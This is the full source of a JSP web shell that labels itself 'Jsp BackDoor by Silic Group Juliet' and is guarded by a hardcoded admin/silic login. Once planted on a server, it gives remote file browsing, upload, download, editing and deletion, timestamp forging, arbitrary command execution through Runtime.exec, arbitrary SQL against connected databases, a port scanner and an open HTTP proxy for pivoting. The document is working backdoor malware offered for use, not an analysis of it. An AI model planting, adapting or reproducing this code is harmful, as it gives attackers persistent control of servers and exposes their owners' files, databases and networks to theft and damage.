<%@page import="java.util.*,java.io.*,java.sql.*,java.util.zip.*,java.lang.reflect.*,java.net.*,javax.servlet.jsp.*"%> <%@page pageEncoding="gbk"%> <%! final String APP_NAME="Manage System - JSP"; int portListen=5000; boolean openHttpProxy=false; void mainForm(String web_Site,JspWriter out)throws Exception{ out.print(""); out.print(""); out.print("
"); out.print(""); out.print(""); out.print("
FilePath:"); out.print(""); out.print(""); out.print(""); out.print("GOtoLink"); out.print("
"); out.print(""); out.print(""); out.print("
"); } void mainMenu(JspWriter out,String web_Site)throws Exception{ out.println(""); out.println(""); out.println(""); out.println(""); out.println(""); out.println(""); out.println(""); out.println(""); out.println("
"+ico(58)+"FileOperation(File.class)
"+ico(48)+"WEB Folder
"+ico(53)+"SystemInfo(System.class)
"+ico(53)+"ServletInfo
"+ico(53)+"SystemTools
"+ico(57)+"Interfaces
About Silic Group
"); } void showFiles(JspWriter out,String path)throws Exception{ File file=new File(path); long maxSize=0; if(file.isDirectory()&&file.exists()){ File[] f=file.listFiles(); out.println(""); for(int i=0;i"); else out.println(""); } out.println("
nametypesizemodify datereadonlycan writehiddenAction
"+ico(48)+f[i].getName()+" DIR "+getSize(f[i].length())+""+new java.util.Date(f[i].lastModified())+""+f[i].canRead()+""+f[i].canWrite()+""+f[i].isHidden()+""+fOperation(true,f[i].getAbsolutePath())+"
"+ico(50)+f[i].getName()+" file "+getSize(f[i].length())+""+new java.util.Date(f[i].lastModified())+""+f[i].canRead()+""+f[i].canWrite()+""+f[i].isHidden()+""+fOperation(false,f[i].getAbsolutePath())+"
"); out.print("this folder size:"+getSize(maxSize)); } } void showSystemInfo(JspWriter out)throws Exception{ Map map=null; Set set=null; Iterator it=null; map=System.getProperties(); set=map.keySet(); it=set.iterator(); out.println("
System Property info:
System CPU :"); out.print(Runtime.getRuntime().availableProcessors()+"
"); out.print("the JVM Free Memory :"+getSize(Runtime.getRuntime().freeMemory())); out.print("
the JVM Max Memory :"+getSize(Runtime.getRuntime().maxMemory())); } void servletInfo(ServletConfig config,JspWriter out)throws Exception{ ServletContext sc=config.getServletContext(); out.println("Server info: "+sc.getServerInfo()+"
"); out.println("ServletContext name: "+sc.getServletContextName()+"
"); out.println("Major version :"+sc.getMajorVersion()+"
"); out.println("Minor version :"+sc.getMinorVersion()+"
"); Enumeration en=sc.getInitParameterNames(); String initInfo="init parameter:
"; out.print(initInfo); while(en.hasMoreElements()){ String name=(String)en.nextElement(); initInfo="key:"+name+" value:"+sc.getInitParameter(name) +"
"; out.print(initInfo); } } void downFile(String filename,HttpServletResponse res)throws Exception{ int w=0; byte[] buffer=new byte[256]; byte[] b=(new File(filename)).getName().getBytes(); String outFile=new String(b,"ISO-8859-1"); res.reset(); res.setHeader("Content-disposition","attachment;filename=\""+outFile+"\""); ServletOutputStream sos=res.getOutputStream(); BufferedInputStream bis=null; try{ bis=new BufferedInputStream(new FileInputStream(filename)); while((w=bis.read(buffer,0,buffer.length))!=-1){ sos.write(buffer,0,w); } }catch(Exception e){ }finally{ if(bis!=null)bis.close(); } sos.flush(); res.flushBuffer(); } void deleteFile(String filename,JspWriter out)throws Exception{ File f=new File(filename); if(f.exists()){ if(f.delete())out.print(filename+"delete success..."); }else{ out.print("file not find!!"); } } void renameFile(String filename,JspWriter out)throws Exception{ int split=filename.indexOf("|"); String newFilename=filename.substring(split+1); filename=filename.substring(0,split); File f=new File(filename); if(f.exists()){ if(f.renameTo(new File(newFilename)))out.print(newFilename+" file move success"); }else{ out.print("file not find!"); } } void copyFile(String filename,JspWriter out)throws Exception{ int split=filename.indexOf("|"); String newFilename=filename.substring(split+1); filename=filename.substring(0,split); File f=new File(filename); BufferedInputStream bis=null; BufferedOutputStream bos=null; if(f.exists()){ try{ bis=new BufferedInputStream(new FileInputStream(filename)); bos=new BufferedOutputStream(new FileOutputStream(newFilename)); int s=0; while((s=bis.read())!=-1){ bos.write(s); } }catch(Exception e){ out.print("file copy failed"); }finally{ if(bis!=null)bis.close(); if(bos!=null)bos.close(); } out.print(newFilename+"file copy success"); }else{ out.print("file not find!"); } } void editFile(String filename,JspWriter out)throws IOException{ File f=new File(filename); out.print("
File Path:"); out.print(""); out.print(""); out.print(""); out.print("
"); } void saveFile(String filename,byte[] fileContent,JspWriter out)throws IOException{ if(filename!=null||fileContent!=null){ BufferedOutputStream bos=null; try{ bos=new BufferedOutputStream(new FileOutputStream(filename)); bos.write(fileContent,0,fileContent.length); }finally{ if(bos!=null)bos.close(); } out.print(filename+"file save success"); }else{ out.print("Error"); } } void dateChange(String filename,String year,String month,String day,JspWriter out)throws IOException{ File f=new File(filename); if(f.exists()){ Calendar calendar=Calendar.getInstance(); calendar.set(Integer.parseInt(year),Integer.parseInt(month),Integer.parseInt(day)); if(f.setLastModified(calendar.getTimeInMillis())) out.print(filename+"file date change success"); else out.print(filename+"file date change error"); }else{ out.println("file not find!!!"); } } void execFile(String file,JspWriter out)throws Exception{ int i=0; Runtime rt=Runtime.getRuntime(); Process ps=rt.exec(file); InputStreamReader isr = null; char[] bufferC=new char[1024]; try{ isr=new InputStreamReader(ps.getInputStream(),"GB2312"); out.print(""); systemTools(out); } void zip(String zipPath, String srcPath,JspWriter out) throws Exception { FileOutputStream output = null; ZipOutputStream zipOutput = null; try{ output = new FileOutputStream(zipPath); zipOutput = new ZipOutputStream(output); zipEntry(zipOutput,srcPath,srcPath,zipPath); }catch(Exception e){ out.print("file zip error"); }finally{ if(zipOutput!=null)zipOutput.close(); } out.print("zip ok"+zipPath); } void zipEntry(ZipOutputStream zipOs, String initPath,String filePath,String zipPath) throws Exception { String entryName = filePath; File f = new File(filePath); if (f.isDirectory()){ String[] files = f.list(); for(int i = 0; i < files.length; i++) zipEntry(zipOs, initPath, filePath + File.separator + files[i],zipPath); return; } String chPh = initPath.substring(initPath.lastIndexOf("/") + 1); int idx=initPath.lastIndexOf(chPh); if (idx != -1) { entryName = filePath.substring(idx); } ZipEntry entry; entry = new ZipEntry(entryName); File ff = new File(filePath); if(ff.getAbsolutePath().equals(zipPath))return; entry.setSize(ff.length()); entry.setTime(ff.lastModified()); entry.setCrc(0); CRC32 crc = new CRC32(); crc.reset(); zipOs.putNextEntry(entry); int len = 0; byte[] buffer = new byte[2048]; int bufferLen = 2048; FileInputStream input =null; try{ input = new FileInputStream(filePath); while ((len = input.read(buffer, 0, bufferLen)) != -1) { zipOs.write(buffer, 0, len); crc.update(buffer, 0, len); } }catch(Exception e){ }finally{ if(input!=null)input.close(); } entry.setCrc(crc.getValue()); } void upfile(HttpServletRequest request,JspWriter out,String filename)throws Exception{ String boundary = request.getContentType().substring(30); ServletInputStream sis=request.getInputStream(); BufferedOutputStream bos=null; byte[] buffer = new byte[1024]; int line=-1; for(int i=0;i<5;i++){ line=readLine(buffer,sis,boundary); } try{ bos=new BufferedOutputStream(new FileOutputStream(filename)); while(line!=-1){ bos.write(buffer,0,line); line=readLine(buffer,sis,boundary); } out.print("upload success"); }catch(Exception e){ out.print("upload failed!"); }finally{ if(bos!=null)bos.close(); } } int readLine(byte[] lineByte,ServletInputStream servletInputstream,String endStr){ try{ int len=0; len=servletInputstream.readLine(lineByte,0,lineByte.length); String str=new String(lineByte,0,len); System.out.println(str); if(str.indexOf(endStr)==-1) return len; else return -1; }catch(Exception _ex){ return -1; } } void newFolder(JspWriter out,String foldername)throws Exception{ File f=new File(foldername); if(f.mkdirs()){ out.print("create folder success"); }else{ out.print("create folder failed!"); } } void reflectAPI(JspWriter out,String className)throws Exception{ Class cls=Class.forName(className); String constructor=""; String ifString=""; Class[] interfaces=cls.getInterfaces(); String supperClass=cls.getSuperclass().toString(); Constructor[] c=cls.getDeclaredConstructors(); Field[] f=cls.getDeclaredFields(); Method[] m=cls.getDeclaredMethods(); for(int i=0;i"+Modifier.toString(cls.getModifiers())+" "+cls+"
extends "+supperClass+"
implemets "+ifString); out.print("
{
Constructor:
"); for(int i=0;i"); out.print("Field:
"); for(int i=0;i"); out.print("Function:
"); for(int i=0;i"); out.print("
}"); } void scanPort(JspWriter out,String strAddress,int startPort,int endPort)throws Exception{ if(endPort65535||endPort>65535||endPort<=0){ out.print("port setup error"); return; } InetAddress ia=InetAddress.getByName(strAddress); for(int p=startPort;p<=endPort;p+=15){ (new ScanPort(ia,p,p+14,out)).start(); } Thread.sleep((int)(endPort/startPort)*5000); } class ScanPort extends Thread{ int startPort; int endPort; InetAddress address; javax.servlet.jsp.JspWriter out; public ScanPort(InetAddress address,int startPort,int endPort,JspWriter out){ this.address=address; this.startPort=startPort; this.endPort=endPort; this.out=out; } public void run(){ Socket s=null; for(int port=startPort;port<=endPort;port++){ try{ s=new Socket(address,port); out.println("port "+port+" is Open
"); } catch(IOException e){ }finally{ try{s.close();}catch(Exception e){} } } } } public void switchProxyService(JspWriter out)throws Exception{ if(openHttpProxy=!openHttpProxy){ new RunProxyService(portListen).start(); out.print("Proxy running"); }else{ out.print("Proxy closed"); } } public class RunProxyService extends Thread{ int port; public RunProxyService(int port){ this.port=port; } public void run(){ try { ServerSocket ss=new ServerSocket(5000); while(true){ if(openHttpProxy){ new HttpProxy(ss.accept()).start(); }else{ break; } } ss.close(); } catch (IOException e) { } } } public class HttpProxy extends Thread{ private Socket s; public int timeOut=10000; public HttpProxy(Socket s){ this.s=s; } public HttpProxy(Socket s,int timeOut){ this.s=s; this.timeOut=timeOut; } public void run(){ byte[] bit=new byte[1024]; int readBit=0; int size=0; String returnAddress=null; int returnPort = 0; String sendHostName=null; int sendPort=0; Socket sendSocket=null; OutputStream os=null; InputStream is=null; try{ int split=0; is=s.getInputStream(); if((size=is.read(bit, 0, bit.length))==-1)return; String httpHead=new String(bit,0,size); split=httpHead.indexOf("\nHost: ")+7; sendHostName=httpHead.substring(split, httpHead.indexOf("\n", split)); if((split=sendHostName.indexOf(':'))!=-1){ sendPort=Integer.parseInt(sendHostName.substring(split+1).trim()); sendHostName=sendHostName.substring(0,split); sendSocket=new Socket(sendHostName.trim(),sendPort); }else{ sendSocket=new Socket(sendHostName.trim(),80); } sendSocket.setSoTimeout(timeOut); os=sendSocket.getOutputStream(); os.write(httpHead.getBytes()); if(size==bit.length) while((size=is.read(bit, 0, bit.length))!=-1){ os.write(bit,0 , size); } os.flush(); is=sendSocket.getInputStream(); os=s.getOutputStream(); while((size=is.read(bit, 0, bit.length))!=-1){ os.write(bit,0 , size); os.flush(); } }catch(SocketException se){ } catch (IOException ie) { } catch (Exception e) { }finally{ if(is!=null){ try { is.close(); } catch (IOException e) { } } if(os!=null){ try { os.close(); } catch (IOException e) { } } } } } void ConnectionDBM(JspWriter out,String driver,String url,String userName,String passWord,String sqlAction,String sqlCmd)throws Exception{ DBM dbm=new DBM(driver,url,userName,passWord,out); if(sqlAction.equals("LDB")){ dbm.lookInfo(); }else{ dbm.executeSQL(sqlCmd); } dbm.closeAll(); } class DBM{ private JspWriter out; private Connection con; private Statement stmt; private ResultSet rs; public DBM(String driverName,String url,String userName,String passWord,JspWriter out)throws Exception{ Class.forName(driverName); this.out=out; con=DriverManager.getConnection(url,userName,passWord); } public void lookInfo()throws Exception{ DatabaseMetaData dbmd=con.getMetaData(); String tableType=null; out.print("DataBaseInfo"); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print("
DataBaseName:"+dbmd.getDatabaseProductName()+"
DataBaseVersion:"+dbmd.getDatabaseProductVersion()+"
the Numeric Function:"+dbmd.getNumericFunctions()+"
the String Function:"+dbmd.getStringFunctions()+"
the TimeDate Function:"+dbmd.getTimeDateFunctions()+"
the System Function:"+dbmd.getSystemFunctions()+"
"); out.print("ProcedureInfo"); try{ getProcedureDetail(dbmd.getProcedures(null,null,null)); }catch(Exception proE){} try{ rs=dbmd.getTables(null,null,null,null); }catch(Exception tabE){} out.print("DataBase Tables Info
"); while(rs.next()){ tableType=rs.getString(4); out.print("TableName:"+rs.getString(3)+" Type:"+tableType+"
"); if(tableType.indexOf("VIEW")>=0||tableType.indexOf("TABLE")>=0){ try{ getTableDetail(dbmd.getColumns(null,null,rs.getString(3),null)); }catch(Exception columnE){} } } this.closeAll(); } private void getTableDetail(ResultSet tableRs)throws Exception{ out.print("
"); while(tableRs.next()){ out.print(""); } out.print("
Column NameData TypeType NameCOLUMN_SIZEIS_NULLABLECHAR_OCTET_LENGTH
"+tableRs.getString(4)+""+tableRs.getInt(5)+""+tableRs.getString(6)+""+tableRs.getInt(7)+""+tableRs.getString(18)+""+tableRs.getInt(16)+"
"); tableRs.close(); } private void getProcedureDetail(ResultSet procRs)throws Exception{ out.print(""); while(procRs.next()){ out.print(""); } out.print("
PROCEDURE_NAMEREMARKSPROCEDURE_TYPE
"+procRs.getString(3)+""+procRs.getString(7)+""+procRs.getShort(8)+"
"); procRs.close(); } public void executeSQL(String sqlCmd)throws Exception{ stmt=con.createStatement(); if(sqlCmd.trim().toLowerCase().startsWith("select")){ rs=stmt.executeQuery(sqlCmd); ResultSetMetaData rsmd=rs.getMetaData(); int ColumnCount=rsmd.getColumnCount(); out.print(""); for(int i=1;i<=ColumnCount;i++){ out.print(""); } out.print(""); while(rs.next()){ out.print(""); for(int i=1;i<=ColumnCount;i++){ out.print(""); } out.print(""); } }else{ stmt.executeUpdate(sqlCmd); out.print("execute success"); } } public void closeAll()throws SQLException{ try{ if(rs!=null)rs.close(); }catch(Exception e){ } try{ if(stmt!=null)stmt.close(); }catch(Exception e){ } try{ if(con!=null)con.close(); }catch(Exception e){ } } } void systemTools(JspWriter out)throws Exception{ out.print("
"+rsmd.getColumnName(i)+"
"+rs.getString(i)+"
"); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); out.print(""); if(!openHttpProxy){ out.print(""); }else{ out.print(""); } out.print("
System class runfilepath:
file uploadfile:upload file
new filefile name:
Create folderfolder name:
Reflect APIClass Name:
Scan PortIP:Start Port:End Port:
DBM"); out.print(""); out.print("Driver:URL:user:password:SqlCmd:
OpenTheHttpProxy
CloseTheHttpProxy
"); } void userInterFaces(JspWriter out)throws Exception{ out.print("Recode by Silic Group Inc."); } String encodeChange(String str)throws Exception{ if(str==null) return null; else return new String(str.getBytes("ISO-8859-1"),"gb2312"); } String folderReplace(String folder){ return folder.replace('\\','/'); } String fOperation(boolean f,String file){ if(f) return "Delete Rename setDate Zip"; else return "Delete Rename setDate Copy Edit Down"; } String getSize(long size){ if(size>=1024*1024*1024){ return new Long(size/1073741824L)+"G"; }else if(size>=1024*1024){ return new Long(size/1048576L)+"M"; }else if(size>=1024){ return new Long(size/1024)+"K"; }else return size+"B"; } String ico(int num){ return "&#"+num+""; } String htmlEntity(String htmlCode){ StringBuffer sb=new StringBuffer(); char c=0; for(int i=0;i')sb.append(">"); else if(c==' ')sb.append(" "); else sb.append(c); } return sb.toString(); } %> <% session.setMaxInactiveInterval(6000); final String WEB_SITE=folderReplace(application.getRealPath("/")); final String URL=request.getRequestURI(); if(session.getAttribute("ID")==null){ String username="admin"; String password="silic"; if(request.getParameter("Silic")!=null&&request.getParameter("juliet")!=null&&request.getParameter("Silic").equals(username)&&request.getParameter("juliet").equals(password)){ session.setAttribute("ID","1"); response.sendRedirect(URL); }else{ out.println("


"+"Jsp BackDoor by Silic Group Juliet"+"

" + "
username:
" + "password:
"); } return; } %> <%=APP_NAME%> <% String Action=request.getParameter("Action"); char action=(Action==null?"0":Action).charAt(0); try{ switch(action){ case 'M':mainMenu(out,WEB_SITE);break; case 'F':showFiles(out,encodeChange(request.getParameter("FolderPath")));break; case 'S':showSystemInfo(out);break; case 'L':servletInfo(config,out);break; case 'D':downFile(encodeChange(request.getParameter("Filename")),response);return; case 'E':editFile(encodeChange(request.getParameter("Filename")),out);break; case 'R':deleteFile(encodeChange(request.getParameter("Filename")),out);break; case 'K':saveFile(encodeChange(request.getParameter("filename")),request.getParameter("FileContent").getBytes("ISO-8859-1"),out);break; case 'N':renameFile(encodeChange(request.getParameter("Filename")),out);break; case 'P':copyFile(encodeChange(request.getParameter("Filename")),out);break; case 'd':dateChange(encodeChange(request.getParameter("Filename")),request.getParameter("year"),request.getParameter("month"),request.getParameter("day"),out);break; case 'r':execFile(encodeChange(request.getParameter("execFile")),out);break; case 'Z':zip(encodeChange(request.getParameter("Filename")),encodeChange(request.getParameter("FolderPath")),out);break; case 'U':upfile(request,out,encodeChange(request.getParameter("UPaddress")));break; case 'n':newFolder(out,encodeChange(request.getParameter("Filename")));break; case 'A':reflectAPI(out,encodeChange(request.getParameter("Filename")));break; case 'I':scanPort(out,encodeChange(request.getParameter("IPaddress")),Integer.parseInt(request.getParameter("startPort")),Integer.parseInt(request.getParameter("endPort")));break; case 's':ConnectionDBM(out,encodeChange(request.getParameter("driver")),encodeChange(request.getParameter("conUrl")),encodeChange(request.getParameter("user")),encodeChange(request.getParameter("password")),encodeChange(request.getParameter("run")),encodeChange(request.getParameter("sqlcmd")));break; case 'H':switchProxyService(out);break; case 'i':userInterFaces(out);break; case 'T':systemTools(out);break; default: mainForm(WEB_SITE,out);break; } }catch(Exception e){ } out.print(""); out.close(); %>